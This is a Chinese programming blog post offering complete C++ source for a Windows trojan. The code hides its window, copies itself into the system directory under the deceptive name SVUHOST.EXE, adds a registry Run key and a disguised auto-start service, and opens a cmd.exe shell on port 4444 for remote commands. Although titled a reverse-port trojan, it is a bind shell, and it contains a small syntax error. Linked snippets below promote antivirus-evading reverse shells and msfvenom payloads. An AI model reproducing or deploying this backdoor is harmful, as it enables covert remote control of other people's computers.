反弹端口木马源码

最新推荐文章于 2024-07-18 17:27:59 发布
最新推荐文章于 2024-07-18 17:27:59 发布
阅读量1.4k 收藏 6
点赞数
CC 4.0 BY-SA版权
文章标签: cmd null path windows service server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/foxfile_hom/article/details/7969420

// BingToCmd.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "BingToCmd.h"
#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <WinSvc.h>

#pragma comment(lib,"ws2_32.lib")
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  //隐藏窗口

#define BUFFERLEN 1024
#define PORT 4444

void AddToService();   //注册为系统服务
void AutoRun();  //开机自动运行
void TelnetForCmd2(); //绑定cmd.exe
void DelSelf();

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// The one and only application object

//CWinApp theApp;

//using namespace std;

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
 AutoRun();
 AddToService();
 //下面是调用绑定cmd.exe的TelnetForCmd函数
 WSAData wsa;
 if(WSAStartup(MAKEWORD(2,2),&wsa) == 0)
 {
  TelnetForCmd2();
  WSACleanup();
 }
 
 return 0;
}

void AddToService()
{
 LPCSTR lpszBinaryPathName = "C:\\windows\\system32\\SVUHOST.EXE";
    //注册为系统服务
 SC_HANDLE schSCManager,schService;
 schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
 schService = CreateService(schSCManager,"WindowsMgr","Windows Manger Control", //将服务的信息添加到SCM的数据库
  SERVICE_ALL_ACCESS,
  SERVICE_WIN32_OWN_PROCESS, // 服务类型
  SERVICE_AUTO_START, // 启动类型
  SERVICE_ERROR_NORMAL, 
  lpszBinaryPathName, // 服务名
  NULL,
  NULL,
  NULL,
  NULL,
  NULL);

    CloseServiceHandle(schService);
}

void AutoRun(void)
{
    TCHAR TempPath[MAX_PATH];
 CString temp;
 
 //确定Windows的系统目录
    ::GetSystemDirectory(TempPath ,MAX_PATH);
 TRACE("Windows system directory %s\n",TempPath);
 
 temp = TempPath;
 temp = temp + _T("\\SVUHOST.EXE");
 int len = temp.GetLength();
 LPBYTE lpb = new BYTE[len];
 
 for(int j = 0; j < len; j++)
 {
  lpb[j] = temp[j];
 }
 
 lpb[j] = 0;

 //获取当前程序路径
 char Path[MAX_PATH];
 ::GetModuleFileName(NULL,Path,MAX_PATH);
 
    //把本程序拷贝到系统目录下,并改名为SVUHOST.EXE,这样做的目的是为了迷惑被控制端用户
    CopyFile(Path, temp ,FALSE);

    HKEY hKey;
 //设置注册表中相关的路径
 LPCTSTR data_Set="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
 //打开注册表中的相应项
 long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey));
 //将相关的信息写入注册表。
 long ret1=(::RegSetValueEx(hKey,_T("systemctrl"),NULL,REG_SZ,lpb,len));
 //关闭注册表中的相应的项
 ::RegCloseKey(hKey);
}

void TelnetForCmd2()   //telnet 绑定cmd.exe

 int val=1;
 char data[BUFFERLEN];
 SOCKET server;
 SOCKET client;
 struct sockaddr_in locsin;
 server = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //创建套接字
 locsin.sin_addr.s_addr=INADDR_ANY;
 locsin.sin_family = AF_INET;
 locsin.sin_port = htons(PORT);
 bind(server, (sockaddr*)&locsin, sizeof(locsin)); //绑定IP地址和端口
 listen(server,2);
 while(1)
 {
  val=sizeof(locsin);
  client=accept(server, (sockaddr*)&locsin,&val);
  if(client!=INVALID_SOCKET)
  {
   HANDLE rp1, wp1;
   SECURITY_ATTRIBUTES sa;
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   unsigned long lBytesRead;
   int ret;
   char cmdLine[1024];
   BOOL cmdcomplete;
   
   sa.nLength = sizeof(sa);
   sa.lpSecurityDescriptor = 0;
   sa.bInheritHandle = TRUE;
   CreatePipe(&rp1, &wp1, &sa, 0);  //创建管道
   
   memset(&si,0,sizeof(si));
   si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
   si.hStdError = si.hStdOutput = wp1;
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);
   cmdcomplete = TRUE;
   
   while(1)
   {
    Sleep(100);
    lBytesRead = 0;
    ret = PeekNamedPipe(rp1,data,BUFFERLEN,&lBytesRead,0,0);
    if(lBytesRead)
    {
     if(ReadFile(rp1, data, lBytesRead, &lBytesRead, 0) > 0)
     {
      ret = send(client, data, lBytesRead, 0);
      if(!ret) break;
     }
    }
    else
    {
     lBytesRead=recv(client, data, BUFFERLEN ,0);
     if(lBytesRead <= 0)
      break;
     if(cmdcomplete == TRUE)
      strcpy(cmdLine,"cmd.exe /c ");
     data[lBytesRead] = '\0';
     strcat(cmdLine,data);
     if(strstr(data,"\n") != 0)
     {
      CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&pi);
      cmdcomplete = TRUE;
     }
     else
     {
      cmdcomplete = FALSE;
     }
     if(!ret) break;
    }
   }
   CloseHandle(rp1);
   CloseHandle(wp1);
   closesocket(client);
  }
//  DelSelf();
 }
 closesocket(server);
}

void DelSelf()
{
    //获取当前程序路径
 char Path[MAX_PATH];
 ::GetModuleFileName(NULL,Path,MAX_PATH);
 //删除自身
 DeleteFile(Path);
}
//====================THE END======================//

反弹shell木马免杀python版
游魂的博客
12-10 1261
反弹shell木马免杀python版 本人自己写的反弹shell工具,技术有限,目前只能反弹一个shell,还没深入研究,不过提权过程中一个shell足够了,毕竟不是远控管理工具。 最新版本的,确实是免杀的。 话不多说,看操作: 第一步打开服务端本地运行server.exe程序。 不修改端口的话回车即可。 端口已经在监听了,等待shell连接。 第二步将反弹shell木马传到网站上运行,c...
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 2028
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 519
反弹端口木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口,为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
C++端口反弹木马
Foxfile_Hom的专栏
01-20 1199
代码: /* ============================== Rebound port in Windows NT By shucx,2003/10 ===============================*/ #include #include #pragma comment(lib,"wsock32.lib") void OutputShell(
五个反弹后门的源代码[转]
02-01 1866
第一个反弹木马代码:作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(
匿名管道技术与反弹木马技术(样例源码
abcd8080的博客
09-22 445
管道是一种简单的进程间通信机制实际上是共享在一段内存。一个进程在管道写数据一个进程读取。匿名管道技术只能在父子进程或者一个进程的两个子进程之间通信。下面是一个简单的例子还有注释 #include "stdafx.h"#include <WinSock2.h>#include <Windows.h>#pragma comment(lib,"ws2_32.lib")...
掌握远程控制:全面解析反弹木马源码设计
掌握这些功能在Delphi中的实现方法对于设计反弹木马源码有直接帮助。这包括了解如何利用API调用、内存读写、进程注入等技术手段。 6. 法律与伦理 虽然不是技术知识点,但强调这一点非常重要。开发和使用反弹木马都...
远程控制-反弹木马设计全部源码
03-26
远程控制-反弹木马设计全部源码
远程反弹木马软件功能介绍与安全使用须知
通过服务端自定义配置,攻击者可以设定木马如何连接回控制端,包括IP地址、端口号和连接密码等,使得木马难以被发现和关闭。 最后需要注意的是,此类工具也常常被用来进行非法活动,例如窃取个人资料、监控和破坏等...
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
经典反向后门源代码(可用)vc++6.0反弹木马
远程桌面控制(C++)源码+程序
05-09
类似windows远程桌面的功能,其中包含服务器端、客户端源代码,采用多线程网络通讯方式。客户端可以对远程桌面电脑控制,包括对远程屏幕画面观看及控制。
C++ 远程控制(服务器端)源代码
08-01
用VC6.0通过编译. 基本上可以熟悉socket,windows ui,图像截取,发送. 事件处理. 适合初学者.
VC++ 远程桌面控制、抓图源程序
03-15
内容索引:VC/C++源码,网络相关,远程控制,抓图,截屏  vc++ 编写的一套远程桌面控制、抓图源程序。主程序分为服务端和客户端,测试前请先运行服务端,当客户端启动后,可以抓取远程主机的桌面信息,当然也可以是当前窗口的信息。源程序在vc++6.0下顺利编译。程序有一个需要完善的地方就是,客户端的截屏窗口不能最小化或支持快捷键,当抓图的时候会连同客户端一同抓取,有点不方便。
visual c++ vc编写远程控制软件源码.zip
01-31
visual c++ vc编写远程控制软件源码.zip
反弹端口木马
rongwenbin的专栏
04-25 4530
首先要知道反弹端口的原理: 简单地说,就是由木马的服务端主动连接客户端所在IP对应的电脑的80端口。相信没有哪个防火墙会拦截这样的连接(因为它们一般认为这是用户在浏览网页),所以反弹端口木马可以穿墙。 以下是在“网络神偷”的介绍中挖下来的:道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相
80端口攻击_「网络安全」常见攻击篇(6)——木马攻击
weixin_39846612的博客
11-08 2811
什么是木马攻击?木马指的是隐藏在正常程序中的一段具有特殊功能的代码,实质上是一种远程控制软件,是一种未经授权,利用网络欺骗或者攻击的手段装入目标计算机中。木马用表面的有趣的、有用的功能来吸引人,但实际上暗含一些不为人知的功能,如复制文件、删除文件、修改计算机配置、浏览文件等。木马通常有两个可执行的程序:一个是客户端,一个是服务端。黑客电脑上安装客户端,目标对象电脑上安装服务端,黑客在远端操作目标对...
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 784
生成木马反弹和简单的Windows提权
C++C++设计远程桌面软件的技术详解
最新发布
kewaqi618的博客
07-18 2155
在当今的数字化时代,远程桌面技术已成为企业远程办公、技术支持、教育培训等领域不可或缺的一部分。它允许用户从任何地点通过互联网安全地访问和控制远程计算机,就像直接坐在那台计算机前一样。C++作为一种高效、灵活且性能强大的编程语言,非常适合用于开发这类对实时性、安全性和稳定性要求极高的应用程序。本文将深入探讨如何使用C++设计并实现一个基本的远程桌面软件,涵盖关键技术点、架构设计、网络通信、图形界面处理及安全策略等方面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值